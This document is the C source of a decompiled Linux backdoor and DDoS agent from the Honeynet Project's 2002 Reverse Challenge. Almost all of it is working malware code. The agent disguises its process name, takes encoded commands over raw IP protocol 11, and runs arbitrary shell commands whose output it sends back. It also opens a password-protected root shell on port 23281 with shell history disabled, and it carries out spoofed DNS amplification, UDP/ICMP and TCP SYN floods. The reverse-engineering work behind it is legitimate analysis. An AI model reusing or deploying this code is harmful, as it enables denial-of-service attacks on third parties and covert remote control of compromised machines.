/* Decompilation of the-binary, from the Honeynet Project's Reverse Challenge. Decompiled by Eloy Paris. June 2002 */ #include #include #include #include #include #include #include #include #include #include #include #include #include /* DNS queries, size of queries, and DNS servers to use in dns_flood() */ #include "data.h" /* Port used to provide a shell on demand (command 6) */ #define SHELL_PORT 23281 int send_response(u_char *, u_char *, u_int); inline u_short checksum(void *data, int len); int send_msg(u_char *, u_char *, u_char *, u_int); u_int host_to_ip(u_char *); int dns_flood(char, char, char, char, u_int, char, char, char, char *); int dns_flood_with_server(char, char, char, char, char, char, char, char, u_int, char, char, char, char *); int udp_or_icmp_flood(u_int, u_short, char, char, char, char, char, char, char, char, u_int, char *); int tcp_syn_flood(char, char, char, char, u_short, u_short, u_int, char, char, char, char, u_int, u_int, char *); void encode(u_int, char *, u_char *); void decode(u_int, const u_char *, char *); char zero_8 = 0; int zero_16 = 0; int current_task_pid; int execute_command_pid; int current_task; /* Command current being executed */ /* Response Mode: 0: Send responses to provided IP address 1: Send responses to 10 random IPs 2: Send responses to the provided IP as well as 9 random IPs */ u_int response_mode; /* Source IP address to use in responses - x807e780..3 */ u_char src[4]; char garbage[] = {0xff, 0xfb, 0x01, 0x00}; int main(int argc, char **argv) { u_char ippacket[2048]; /* bpm2048 */ u_char decoded[2048] /* bpm4096 */, *decodedptr /* bpm17632 */; struct sockaddr_in to; /* bpm4552 */ struct sockaddr_in from; /* bpm4568 */ u_int sockopt; /* bpm17600 */ u_int from_len; /* bpm17604 */ int sockfd; /* bpm17608 */ int connected_sockfd; /* bpm17612 */ struct iphdr *ippacketptr; /* bpm17616 */ u_char *ipdata /* bpm17620 */, *payload; /* bpm17624 */ FILE *output_file; int bytes_recvd; char *ips_ptr /* bpm17636 */, dest_ips[40]; /* bpm4536 */ char *bufptr /* bpm17640 */, buffer[400]; /* bpm4496 */ size_t bytes_read; char pwbuff[19]; /* bpm17340 */ char hostname[255]; /* Host name */ u_int i; /* register (ebx) */ u_int j; /* register (esi) */ u_int sent_first_packet; /* register (edi) */ u_int random_index; /* register (edi) */ sockopt = 1; ippacketptr = (struct iphdr *) &ippacket; ipdata = ippacket + sizeof(struct iphdr); payload = ippacket + sizeof(struct iphdr) + 2; from_len = sizeof(from); if (geteuid() != 0) exit(-1); /* Conceal program name */ memset(argv[0], 0, strlen(argv[0]) ); strcpy(argv[0], "[mingetty]"); signal(SIGCHLD, SIG_IGN); if (fork() != 0) exit(0); setsid(); signal(SIGCHLD, SIG_IGN); if (fork() !=0) exit(0); chdir("/"); close(STDIN_FILENO); close(STDOUT_FILENO); close(STDERR_FILENO); srand(time(NULL) ); sockfd = socket(PF_INET, SOCK_RAW, 11); signal(SIGHUP, SIG_IGN); signal(SIGTERM, SIG_IGN); signal(SIGCHLD, SIG_IGN); signal(SIGCHLD, SIG_IGN); decodedptr = decoded; ips_ptr = dest_ips; /* loop forever */ for (;;) { bytes_recvd = recv(sockfd, &ippacket, sizeof(ippacket), 0); if (ippacketptr->protocol != 11 || ipdata[0] != 2 || bytes_recvd <= 200) continue; decode(bytes_recvd - sizeof(struct iphdr) - 2, payload, decodedptr); switch (decoded[1]) { /* Command 1: send status */ case 1: ippacket[0] = zero_8; ippacket[0] = zero_16; ( (struct iphdr *) ippacket)->tos = 1; ippacket[2] = 7; if (current_task_pid != 0) { ippacket[3] = 1; ( (struct iphdr *) ippacket)->id = current_task; } else ippacket[3] = 0; encode(400, ippacket, decodedptr); send_response(ips_ptr, decodedptr, (rand() % 201) + 400); break; /* Command 2: initialize comm. parameters. - Set source IP address to be used in replies to dest. IP in IP header. - Set array of dest. IP address to be used in replies: decoded[2] == 0: respond to IP address specified in decoded[3..6]. decoded[2] == 1: respond to 9 random IP addresses and to the IP specified in decoded[3..6]. decoded[2] == 2: respond to the 10 IP addresses specified starting at decoded[3]. */ case 2: response_mode = decoded[2]; src[0] = ippacket[16]; // Dest. IP address in IP header src[1] = ippacket[17]; src[2] = ippacket[18]; src[3] = ippacket[19]; srand(time(NULL) ); random_index = rand() % 10; for (j = 0, i = 0; i <= 9; j += 4, i++) { /* This is a bug if response_mode == 2 */ if (i == random_index) continue; if (response_mode == 2) { ips_ptr[j + 0] = decoded[i*4 + 3]; ips_ptr[j + 1] = decoded[i*4 + 4]; ips_ptr[j + 2] = decoded[i*4 + 5]; ips_ptr[j + 3] = decoded[i*4 + 6]; } else { ips_ptr[j + 0] = rand(); ips_ptr[j + 1] = rand(); ips_ptr[j + 2] = rand(); ips_ptr[j + 3] = rand(); } } if (response_mode == 0) random_index = 0; if (response_mode != 2) { ips_ptr[random_index*4 + 0] = decoded[3]; ips_ptr[random_index*4 + 1] = decoded[4]; ips_ptr[random_index*4 + 2] = decoded[5]; ips_ptr[random_index*4 + 3] = decoded[6]; } break; /* Command 3: run command, return results */ case 3: if ( (execute_command_pid = fork() ) == 0) { /* Child's thread */ setsid(); signal(SIGCHLD, SIG_IGN); if (fork() != 0) { /* Parent's thread: kill child in 10 secods. */ sleep(10); kill(execute_command_pid, SIGTERM); exit(0); } /* Command to execute starts at decoded + 2, move it to decoded + 0 */ for (i = 0; i <= 397; i++) decoded[i] = decoded[i + 2]; sprintf(ippacket, /* "/bin/csh -f -c \"%s\" 1> %s 2>&1", */ "%s 1> %s 2>&1", decodedptr, "/tmp/.hj237349"); system(ippacket); output_file = fopen("/tmp/.hj237349", "rb"); if (output_file != NULL) { sent_first_packet = 0; bufptr = buffer; do { bytes_read = fread(ippacket, 1, 398, output_file); ippacket[bytes_read] = '\0'; for (i = 0; i <= 397; i++) decoded[i + 2] = ippacket[i]; if (!sent_first_packet) { sent_first_packet = 1; decoded[1] = 3; } else decoded[1] = 4; encode(400, decodedptr, bufptr); send_response(ips_ptr, bufptr, (rand() % 201) + 400); usleep(400000); } while (bytes_read != 0); fclose(output_file); unlink("/tmp/.hj237349"); } _exit(0); } break; /* Command 4: DNS flood, use random DNS servers */ case 4: if (current_task_pid == 0) { current_task = 4; if ( (current_task_pid = fork() ) == 0) { memcpy(hostname, decoded, sizeof(hostname) ); for (i = 0; i <= 254; i++) hostname[i] = hostname[i + 9]; dns_flood(decoded[2], decoded[3], decoded[4], decoded[5], 0, decoded[6], decoded[7], decoded[8], hostname); _exit(0); } } break; /* Command 5: UDP or ICMP flood */ case 5: if (current_task_pid == 0) { current_task = 5; if ( (current_task_pid = fork() ) == 0) { memcpy(hostname, decoded, sizeof(hostname) ); for (i = 0; i <= 254; i++) hostname[i] = hostname[i + 13]; udp_or_icmp_flood(decoded[2], decoded[3], decoded[4], decoded[5], decoded[6], decoded[7], decoded[8], decoded[9], decoded[10], decoded[11], decoded[12], hostname); _exit(0); } } break; /* Command 6: open shell */ case 6: if (current_task_pid == 0) { current_task = 6; signal(SIGCHLD, SIG_IGN); if ( (current_task_pid = fork() ) == 0) { /* Child */ setsid(); signal(SIGCHLD, SIG_IGN); to.sin_family = AF_INET; to.sin_port = htons(SHELL_PORT); to.sin_addr.s_addr = htonl(INADDR_ANY); sockopt = 1; sockfd = socket(PF_INET, SOCK_STREAM, 0); signal(SIGCHLD, SIG_IGN); signal(SIGCHLD, SIG_IGN); signal(SIGHUP, SIG_IGN); signal(SIGTERM, SIG_IGN); signal(SIGINT, SIG_IGN); setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &sockopt, sizeof(sockopt) ); bind(sockfd, (struct sockaddr *) &to, sizeof(to) ); listen(sockfd, 3); while ( (connected_sockfd = accept(sockfd, (struct sockaddr *) &from, &from_len) ) != 0) { if (fork() == 0) { recv(connected_sockfd, pwbuff, sizeof(pwbuff), 0); for (i = 0; i <= 18; i++) if (pwbuff[i] == '\n' || pwbuff[i] == '\r') pwbuff[i] = '\0'; else pwbuff[i]++; if (strcmp("TfOjG", pwbuff) ) { /* Password is not "SeNiF" */ send(connected_sockfd, garbage, sizeof(garbage), 0); close(connected_sockfd); exit(1); } else { dup2(connected_sockfd, STDIN_FILENO); dup2(connected_sockfd, STDOUT_FILENO); dup2(connected_sockfd, STDERR_FILENO); setenv("PATH", "/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:.", 1); unsetenv("HISTFILE"); setenv("TERM", "linux", 1); execl("/bin/sh", "sh", NULL); close(connected_sockfd); exit(0); } } } exit(0); } } break; /* Command 7: run command, don't return results */ case 7: if ( (execute_command_pid = fork() ) == 0) { /* Child */ setsid(); signal(SIGCHLD, SIG_IGN); if (fork() != 0) { /* Give child 20 minutes to finish */ sleep(1200); kill(execute_command_pid, SIGKILL); exit(0); } else { for (i = 0; i <= 397; i++) decoded[i] = decoded[i + 2]; /* Originally "/bin/csh -f -c \"%s\"" */ sprintf(ippacket, "%s", decodedptr); system(ippacket); _exit(0); } } break; /* Command 8: kill current task */ case 8: if (current_task_pid != 0) { kill(current_task_pid, SIGKILL); current_task_pid = 0; } break; /* Command 9: DNS flood, use random servers */ case 9: if (current_task_pid == 0) { current_task = 9; if ( (current_task_pid = fork() ) == 0) { memcpy(hostname, decoded, sizeof(hostname) ); for (i = 0; i <= 254; i++) hostname[i] = hostname[i + 10]; dns_flood(decoded[2], decoded[3], decoded[4], decoded[5], decoded[6], decoded[7], decoded[8], decoded[9], hostname); _exit(0); } } break; /* Command 10: TCP SYN attack */ case 10: if (current_task_pid == 0) { current_task = 10; if ( (current_task_pid = fork() ) == 0) { memcpy(hostname, decoded, sizeof(hostname) ); for (i = 0; i <= 254; i++) hostname[i] = hostname[i + 14]; tcp_syn_flood(decoded[2], decoded[3], decoded[4], decoded[5], decoded[6], decoded[7], decoded[8], decoded[9], decoded[10], decoded[11], decoded[12], 0, decoded[13], hostname); _exit(0); } } break; /* Command 11: TCP SYN flood */ case 11: if (current_task_pid == 0) { current_task = 11; if ( (current_task_pid = fork() ) == 0) { memcpy(hostname, decoded, sizeof(hostname) ); for (i = 0; i <= 254; i++) hostname[i] = hostname[i + 15]; tcp_syn_flood(decoded[2], decoded[3], decoded[4], decoded[5], decoded[6], decoded[7], decoded[8], decoded[9], decoded[10], decoded[11], decoded[12], decoded[13], decoded[14], hostname); _exit(0); } } break; /* Command 12: DNS flood, use provided DNS server */ case 12: if (current_task_pid == 0) { current_task = 12; if ( (current_task_pid = fork() ) == 0) { memcpy(hostname, decoded, sizeof(hostname) ); for (i = 0; i <= 254; i++) hostname[i] = hostname[i + 14]; dns_flood_with_server(decoded[2], decoded[3], decoded[4], decoded[5], decoded[6], decoded[7], decoded[8], decoded[9], decoded[10], decoded[11], decoded[12], decoded[13], hostname); _exit(0); } } break; } usleep(10000); } } int send_response(u_char *dest, u_char *payload, u_int len) { u_char *ptr; if (response_mode == 0) send_msg(src, dest, payload, len); else for (ptr = dest; ptr <= dest + 9*4; ptr += 4) { usleep(4000); send_msg(src, ptr, payload, len); } return 1; } inline u_short checksum(void *data, int len) { int counter = len; u_short *w = data; int sum = 0; u_short tmp = 0; do { sum += *w++; counter -= 2; } while (counter > 1); if (counter == 1) { *(u_char *) &tmp = *(u_char *) w; sum += tmp; } sum = (sum >> 16) + (u_short) sum; sum += sum >> 16; tmp = ~sum; return tmp; } int send_msg(u_char *src, u_char *dest, u_char *data, u_int len) { struct iphdr *ippacket; /* register variable - esi */ struct sockaddr_in to; /* bpm16 */ u_char ip_addr[16]; /* bpm48 - For "w.x.y.z" */ u_char *ipdata2; /* bpm56 store pointer to beginning of IP data + 2 */ u_char *ipdata; /* bpm64 - store pointer to beginning of IP data */ int sockfd; /* bpm68 */ if ( (sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_RAW) ) == -1) return 0; if ( (ippacket = malloc(len + sizeof(struct iphdr) + 3) ) == NULL) return 0; ipdata = (char *) ippacket + sizeof(struct iphdr); /* Start of IP data */ ipdata2 = (char *) ippacket + 22; /* Fill src. IP address in IP header */ *( (char *) ippacket + 12) = src[0]; *( (char *) ippacket + 13) = src[1]; *( (char *) ippacket + 14) = src[2]; *( (char *) ippacket + 15) = src[3]; /* Fill dest. IP address in IP header */ *( (char *) ippacket + 16) = dest[0]; *( (char *) ippacket + 17) = dest[1]; *( (char *) ippacket + 18) = dest[2]; *( (char *) ippacket + 19) = dest[3]; sprintf(ip_addr, "%d.%d.%d.%d", dest[0], dest[1], dest[2], dest[3]); to.sin_addr.s_addr = host_to_ip(ip_addr); to.sin_port = 10; to.sin_family = AF_INET; /* Build IP header */ ippacket->version = 4; ippacket->ihl = 5; ippacket->ttl = 250; ippacket->protocol = 11; ippacket->tot_len = htons(len + 22); ippacket->tos = 0; ippacket->id = htons(rand() ); ippacket->frag_off = 0; ippacket->check = 0; ippacket->check = checksum(ippacket, sizeof(struct iphdr) ); ipdata[0] = 3; /* Code for "From agent to master" */ memcpy(ipdata2, data, len); if (sendto(sockfd, ippacket, len + sizeof(struct iphdr) + 2, 0, (struct sockaddr *) &to, sizeof(to) ) == -1) { free(ippacket); return 0; } close(sockfd); free(ippacket); return 1; } u_int host_to_ip(u_char *host) { static u_int ip; struct hostent *hostent; if ( (hostent = gethostbyname(host) ) == NULL) return 0; memcpy(&ip, hostent->h_addr_list[0], hostent->h_length); return ip; } /* src1.src2.src3.src4: source (victim) IP address to use if c8 = 0. c5: number of times to send each DNS query. src_port_hi, src_port_lo: source UDP port to use (use random port if both zero) c8: if 1 use hostname as source address, if 0 use a.b.c.d. hostname: victim host name */ int dns_flood(char src1, char src2, char src3, char src4, u_int c5, char src_port_hi, char src_port_lo, char c8, char *hostname) { struct query_size bpm36[N_QUERIES]; /* Query sizes */ char bpm536[sizeof(x80676bc)]; /* Queries */ u_int bpm1620; char bpm1604, bpm1608, bpm1612, bpm1616; struct iphdr *esi; u_char bpm1592[1024]; /* IP packet: IP header + UDP header + UDP data */ u_char *bpm1632; /* Will point to UDP _data_ */ struct udphdr *bpm1628; /* Will point to IP _data_ */ u_int bpm1636, bpm1640; struct sockaddr_in bpm552; int sockfd; int edi, edx; int tmp; struct hostent *hostent_ptr; struct in_addr bpm1596; int bpm1648; /* Index into array of DNS queries */ struct in_addr *bpm1644; /* Source IP address */ bpm1604 = src1; bpm1608 = src2; bpm1612 = src3; bpm1616 = src4; /* Copy query sizes into bpm36[] */ memcpy(bpm36, x8067698, sizeof(x8067698) ); bpm1620 = 1; /* Copy query structures into bpm536[] */ memcpy(bpm536, x80676bc, sizeof(x80676bc) ); /* We will build the IP packet in bpm1592[] */ esi = (struct iphdr *) bpm1592; bpm1628 = (struct udphdr *) (bpm1592 + sizeof(struct iphdr)); bpm1632 = bpm1592 + sizeof(struct iphdr) + sizeof(struct udphdr); bpm552.sin_family = AF_INET; bpm552.sin_port = 0; if (c5 != 0) c5--; if ( (sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_RAW) ) > 0) { bpm1636 = bpm1640 = 0; /* Clear IP packet */ memset(esi, 0, sizeof(bpm1592) ); while (1) { do { edi = 0; if (c8 != 0 && bpm1640 <= 0) { if ( (hostent_ptr = gethostbyname(hostname) ) == NULL) { sleep(600); edi = 1; } else { bcopy(*hostent_ptr->h_addr_list, &bpm1596, 4); esi->saddr = bpm1596.s_addr; bpm1640 = 40000; } } } while (edi); for (edi = 0, bpm1648 = 0; edi <= 8; edi++, bpm1648 += 50) { if (bpm1620 == 1) { bpm1620 = 0; edx = random() % 8000; } else edx = 0; if (x806d22c[edx] != 0) { /* x806d22c is an array of DNS servers */ bpm1644 = (struct in_addr *) &x806d22c[edx]; do { /* Set up sockaddr_in structure */ bpm552.sin_addr.s_addr = bpm1644->s_addr; /* Copy DNS query to UDP data section in IP packet */ memcpy(bpm1632, &bpm536[bpm1648], bpm36[edi].size); /* Use a random DNS identifier */ bpm1632[0] = random() % 255; bpm1632[1] = random() % 255; /* Build UDP header */ if (src_port_hi == 0 && src_port_lo == 0) tmp = random() % 30000; else tmp = (src_port_hi << 8) + src_port_lo; bpm1628->source = htons(tmp); bpm1628->dest = htons(53); bpm1628->len = htons(bpm36[edi].size + 8); bpm1628->check = 0; if (c8 == 0) { /* Use IP address passed to us as source address */ bpm1592[12] = bpm1604; bpm1592[13] = bpm1608; bpm1592[14] = bpm1612; bpm1592[15] = bpm1616; } /* Build IP header */ esi->daddr = bpm1644->s_addr; /* DNS server to query */ esi->version = 4; esi->ihl = 5; esi->ttl = (random() % 130) + 120; esi->id = random() % 255; esi->protocol = IPPROTO_UDP; esi->frag_off = 0; esi->tot_len = htons(bpm36[edi].size + 28); esi->check = 0; esi->check = checksum(esi, sizeof(struct iphdr)); sendto(sockfd, bpm1592, bpm36[edi].size + sizeof(struct iphdr) + sizeof(struct udphdr), 0, (struct sockaddr *) &bpm552, sizeof(bpm552)); if (c5 == 0) { usleep(300); bpm1640--; } else if (bpm1636 == c5) { usleep(300); bpm1636 = 0; bpm1640--; } else bpm1636++; bpm1644++; } while (bpm1644->s_addr != 0); } /* if (x806d22c[edx] != 0) */ } /* for () */ } } current_task_pid = 0; return 0; } /* dst1.dst2.dst3.dst4: DNS server to send the query to. Used if c8 = 0, otherwise hostname is used. src1.src2.src3.src4: source (victim) IP address to use (if 0 then use random IP) c5: number of times to send each DNS query. src_port_hi, src_port_lo: source UDP port to use (use random port if both zero) c8: if 1 use hostname as DNS server, if 0 use a.b.c.d as the DNS server. hostname: DNS server to use if c8 == 1 */ int dns_flood_with_server(char dst1, char dst2, char dst3, char dst4, char src1, char src2, char src3, char src4, u_int c5, char src_port_hi, char src_port_lo, char c8, char *hostname) { struct query_size bpm36[N_QUERIES]; /* Query sizes */ char bpm536[sizeof(x80676bc)]; /* Queries */ struct sockaddr_in sockaddr; u_char ippacket[1024]; /* IP packet: IP header + UDP header + UDP data */ char bpm1608[32]; struct in_addr bpm1612; char bpm1620, bpm1624, bpm1628, bpm1632; char bpm1636, bpm1640, bpm1644, bpm1648; int sockfd; /* bpm1652 */ struct udphdr *updhdr_ptr; /* Will point to IP _data_ */ u_char *upddata_ptr; /* Will point to UDP _data_ */ u_int bpm1664, bpm1668; int j; /* Index into array of DNS queries */ struct iphdr *iphdr_ptr; struct hostent *hostent_ptr; int tmp, flag, i; bpm1620 = dst1; bpm1624 = dst2; bpm1628 = dst3; bpm1632 = dst4; bpm1636 = src1; bpm1640 = src2; bpm1644 = src3; bpm1648 = src4; /* Copy query sizes into bpm36[] */ memcpy(bpm36, x8067698, sizeof(x8067698) ); /* Copy query structures into bpm536[] */ memcpy(bpm536, x80676bc, sizeof(x80676bc) ); /* We will build the IP packet in ippacket[] */ iphdr_ptr = (struct iphdr *) ippacket; updhdr_ptr = (struct udphdr *) (ippacket + sizeof(struct iphdr)); upddata_ptr = ippacket + sizeof(struct iphdr) + sizeof(struct udphdr); sockaddr.sin_family = AF_INET; sockaddr.sin_port = 0; if (c8 == 0) sprintf(bpm1608, "%d.%d.%d.%d", bpm1620, bpm1624, bpm1628, bpm1632); if (c5 != 0) c5--; if ( (sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_RAW) ) > 0) { bpm1664 = bpm1668 = 0; /* Clear IP packet */ memset(iphdr_ptr, 0, sizeof(ippacket) ); while (1) { do { flag = 0; if (c8 != 0 && bpm1668 <= 0) { if ( (hostent_ptr = gethostbyname(hostname) ) == NULL) { sleep(600); flag = 1; } else { bcopy(*hostent_ptr->h_addr_list, &bpm1612, 4); iphdr_ptr->daddr = bpm1612.s_addr; sockaddr.sin_addr.s_addr = bpm1612.s_addr; bpm1668 = 40000; } } } while (flag); for (i = 0, j = 0; i <= 8; i++, j += 50) { if (c8 == 0) sockaddr.sin_addr.s_addr = inet_addr(bpm1608); /* Copy DNS query to UDP data section in IP packet */ memcpy(upddata_ptr, &bpm536[j], bpm36[i].size); /* Use a random DNS identifier */ upddata_ptr[0] = random() % 255; upddata_ptr[1] = random() % 255; /* Build UDP header */ if (src_port_hi == 0 && src_port_lo == 0) tmp = random() % 30000; else tmp = (src_port_hi << 8) + src_port_lo; updhdr_ptr->source = htons(tmp); updhdr_ptr->dest = htons(53); updhdr_ptr->len = htons(bpm36[i].size + 8); updhdr_ptr->check = 0; /* Build IP header */ /* Source IP */ if (bpm1636 == 0 && bpm1640 == 0 && bpm1644 == 0 && bpm1648 == 0) { tmp = random(); ippacket[12] = tmp + (tmp >= 255 ? 1 : 0); tmp = random(); ippacket[13] = tmp + (tmp >= 255 ? 1 : 0); tmp = random(); ippacket[14] = tmp + (tmp >= 255 ? 1 : 0); tmp = random(); ippacket[15] = tmp + (tmp >= 255 ? 1 : 0); } else { ippacket[12] = bpm1636; ippacket[13] = bpm1640; ippacket[14] = bpm1644; ippacket[15] = bpm1648; } /* Destination IP */ if (c8 == 0) { ippacket[16] = bpm1620; ippacket[17] = bpm1624; ippacket[18] = bpm1628; ippacket[19] = bpm1632; } iphdr_ptr->version = 4; iphdr_ptr->ihl = 5; iphdr_ptr->ttl = (random() % 130) + 120; iphdr_ptr->id = random() % 255; iphdr_ptr->protocol = IPPROTO_UDP; iphdr_ptr->frag_off = 0; iphdr_ptr->tot_len = htons(bpm36[i].size + 28); iphdr_ptr->check = 0; iphdr_ptr->check = checksum(iphdr_ptr, sizeof(struct iphdr)); sendto(sockfd, ippacket, bpm36[i].size + sizeof(struct iphdr) + sizeof(struct udphdr), 0, (struct sockaddr *) &sockaddr, sizeof(sockaddr)); if (c5 == 0) { usleep(300); bpm1668--; } else if (bpm1664 == c5) { usleep(300); bpm1664 = 0; bpm1668--; } else bpm1664++; } /* for () */ } /* while (1) */ } current_task_pid = 0; return 0; } /* udp_attack: 1: UDP flood, 0: ICMP echo flood udp_dest_port: dest port (for UDP flood) dst1.dst2.dst3.dst4: victim (dest.) IP address to use if bpp48 = 0. src1.src2.src3.src4: source IP address. bpp48: if 1 resolve hostname as victim, if 0 use a.b.c.d as victim hostname: hostname to use if bpp48 = 1 */ int udp_or_icmp_flood(u_int udp_attack, u_short udp_dest_port, char dst1, char dst2, char dst3, char dst4, char src1, char src2, char src3, char src4, u_int use_hostname, char *hostname) { struct sockaddr_in sockaddr; struct { struct iphdr ip; union { struct udphdr udp; struct icmphdr icmp; } u; char data; } packet; char buffer1[32]; /* For sprintf */ char buffer2[32]; /* For sprintf */ struct in_addr bpm120; char bpm124, bpm128, bpm132, bpm136; char bpm140, bpm144, bpm148, bpm152; int sockfd; struct sockaddr_in *sockaddr_ptr; struct hostent *hostent_ptr; int i, flag, packet_size; bpm124 = dst1; bpm128 = dst2; bpm132 = dst3; bpm136 = dst4; bpm140 = src1; bpm144 = src2; bpm148 = src3; bpm152 = src4; sockaddr.sin_family = AF_INET; sockaddr.sin_port = htons(random() % 255); sprintf(buffer2, "%d.%d.%d.%d", bpm140, bpm144, bpm148, bpm152); if (use_hostname == 0) { sprintf(buffer1, "%d.%d.%d.%d", bpm124, bpm128, bpm132, bpm136); sockaddr.sin_addr.s_addr = inet_addr(buffer1); } if ( (sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_RAW) ) > 0) { packet.ip.version = 4; packet.ip.ihl = 5; packet.ip.tot_len = htons(10268); packet.ip.id = htons(0x0455); packet.ip.ttl = random() % 130 + 120; packet.ip.saddr = inet_addr(buffer2); if (use_hostname == 0) packet.ip.daddr = inet_addr(buffer1); packet.ip.frag_off = htons(0x1ffe); packet.ip.check = 0; if (udp_attack) { packet.ip.protocol = IPPROTO_UDP; packet.u.udp.source = htons(random() % 255); packet.u.udp.dest = htons(udp_dest_port); packet.u.udp.len = htons(9); packet.u.udp.check = checksum(&packet.u.udp, 9); packet.data = 0x61; /* UDP data */ } else { packet.ip.protocol = IPPROTO_ICMP; packet.u.icmp.type = ICMP_ECHO; packet.u.icmp.code = 0; packet.u.icmp.checksum = 0; packet.u.icmp.checksum = checksum(&packet.u.icmp, 9); } packet_size = 29; /* Size of IP packet + UDP/ICMP data */ packet.ip.check = checksum(&packet, sizeof(struct iphdr) ); for (i = 0, sockaddr_ptr = &sockaddr;; i--) { flag = 0; if (use_hostname != 0 && i <= 0) { if ( (hostent_ptr = gethostbyname(hostname) ) == NULL) { sleep(600); flag = 1; } else { bcopy(*hostent_ptr->h_addr_list, &bpm120, 4); packet.ip.daddr = bpm120.s_addr; sockaddr.sin_addr.s_addr = bpm120.s_addr; i = 40000; } } if (flag == 0) { sendto(sockfd, &packet, packet_size, 0, (struct sockaddr *) sockaddr_ptr, sizeof(struct sockaddr_in) ); sendto(sockfd, &packet, packet_size, 0, (struct sockaddr *) sockaddr_ptr, sizeof(struct sockaddr_in) ); usleep(20); } } } current_task_pid = 0; return 0; } /* bpp8..bpp20: victim IP address bpp24, bpp28: dest. TCP port hi & lo bpp32: use real address (bpp8..bp20) bpp36..bpp48: source IP address bpp24, bpp28: dest TCP port bpm52: delay bpp56: use hostname hostname: victim hostname */ int tcp_syn_flood(char dst1, char dst2, char dst3, char dst4, u_short port_hi, u_short port_lo, u_int use_real_ip, char src1, char src2, char src3, char src4, u_int delay, u_int use_hostname, char *hostname) { struct sockaddr_in sockaddr; struct { /* IP packet: IP header + TCP header (no TCP data) */ struct iphdr ip; struct tcphdr tcp; } packet; struct pseudo_packet { struct in_addr saddr; struct in_addr daddr; u_char zero; u_char protocol; u_short len; struct tcphdr tcphdr; } pseudo_packet; char buffer1[32]; /* For sprintf */ char buffer2[32]; /* For sprintf */ struct in_addr dest_addr; char bpm164, bpm168, bpm172, bpm200; char bpm176, bpm180, bpm184, bpm188; int sockfd; /* bpm192 */ struct pseudo_packet *bpm196; /* Pointer to pseudo_packet */ int flag; u_int counter; int counter2; struct hostent *hostent_ptr; bpm164 = dst1; bpm168 = dst2; bpm172 = dst3; bpm200 = dst4; bpm176 = src1; bpm180 = src2; bpm184 = src3; bpm188 = src4; if (delay != 0) delay--; srandom(time(NULL) ); sockaddr.sin_family = AF_INET; sockaddr.sin_port = htons(random() % 255); if (use_hostname == 0) { sprintf(buffer1, "%d.%d.%d.%d", bpm164, bpm168, bpm172, bpm200); sockaddr.sin_addr.s_addr = inet_addr(buffer1); } packet.ip.version = 4; packet.ip.ihl = 5; packet.ip.tot_len = htons(0x28); packet.ip.tos = 0; if ( (sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_RAW) ) > 0) { if (use_real_ip) sprintf(buffer2, "%d.%d.%d.%d", bpm176, bpm180, bpm184, bpm188); if (use_hostname == 0) packet.ip.daddr = inet_addr(buffer1); packet.ip.frag_off = 0; packet.ip.protocol = IPPROTO_TCP; /* TCP Header */ packet.tcp.ack = 0; packet.tcp.doff = 5; packet.tcp.ack_seq = 0; packet.tcp.res1 = 0; packet.tcp.psh = 0; packet.tcp.rst = 0; packet.tcp.syn = 1; /* Oh yes! */ packet.tcp.fin = 0; packet.tcp.urg_ptr = 0; packet.tcp.dest = htons( (port_hi << 8) + port_lo); counter = 0; pseudo_packet.zero = 0; if (use_hostname == 0) pseudo_packet.daddr.s_addr = packet.ip.daddr; pseudo_packet.protocol = IPPROTO_TCP; pseudo_packet.len = htons(0x14); counter2 = 0; bpm196 = &pseudo_packet; while (1) { do { flag = 0; if (use_hostname != 0 && counter2 <= 0) { if ( (hostent_ptr = gethostbyname(hostname) ) == NULL) { sleep(600); flag = 1; } else { bcopy(*hostent_ptr->h_addr_list, &dest_addr, 4); packet.ip.daddr = dest_addr.s_addr; sockaddr.sin_addr.s_addr = dest_addr.s_addr; pseudo_packet.daddr.s_addr = dest_addr.s_addr; counter2 = 40000; } } } while (flag != 0); packet.ip.id = htons(rand() % 3089) + 2; packet.tcp.window = htons(rand() % 1401 + 200); packet.tcp.source = htons(rand() % 40000 + 1); packet.tcp.seq = htons(htons(rand() % 40000000 + 1) >> 16); packet.ip.ttl = htons(rand() % 116) + 125; if (!use_real_ip) sprintf(buffer2, "%u.%u.%u.%u", rand() % 255, rand() % 255, rand() % 255, rand() % 255); packet.ip.saddr = inet_addr(buffer2); pseudo_packet.saddr.s_addr = inet_addr(buffer2); packet.tcp.check = 0; packet.ip.check = 0; bcopy(&packet.tcp, &pseudo_packet.tcphdr, sizeof(struct tcphdr) ); packet.tcp.check = checksum(bpm196, sizeof(pseudo_packet) ); packet.ip.check = checksum(&packet, sizeof(struct iphdr) ); sendto(sockfd, &packet, sizeof(packet), 0, (struct sockaddr *) &sockaddr, sizeof(struct sockaddr_in) ); if (delay == 0) { usleep(300); counter2--; } else if (delay == counter) { usleep(300); counter = 0; counter2--; } else counter++; } } current_task_pid = 0; return 0; } void encode(u_int len, char *recvbuff, u_char *decoded) { u_int i; decoded[0] = '\0'; sprintf(decoded, "%c", recvbuff[0] + 23); for (i = 1; i != len; i++) decoded[i] = recvbuff[i] + 23 + decoded[i - 1]; } void decode(u_int len, const u_char *encoded, char *decoded) { u_char *buffer; // word-aligned array of (len + 3) elements int eax, ebx, ecx; u_int edx; buffer = (u_char *) malloc( (len + 3) & 0xfffffffc); decoded[0] = 0; for (ebx = len - 1; ebx >= 0; ebx--) { eax = ebx ? encoded[ebx] - encoded[ebx - 1] : encoded[0]; ecx = eax - 23; while (ecx < 0) ecx += 256; for (edx = 0; edx < len; edx++) buffer[edx] = decoded[edx]; decoded[0] = (u_char) ecx; for (edx = 1; edx < len; edx++) decoded[edx] = buffer[edx - 1]; sprintf(decoded, "%c%s", (u_char) ecx, buffer); } free(buffer); }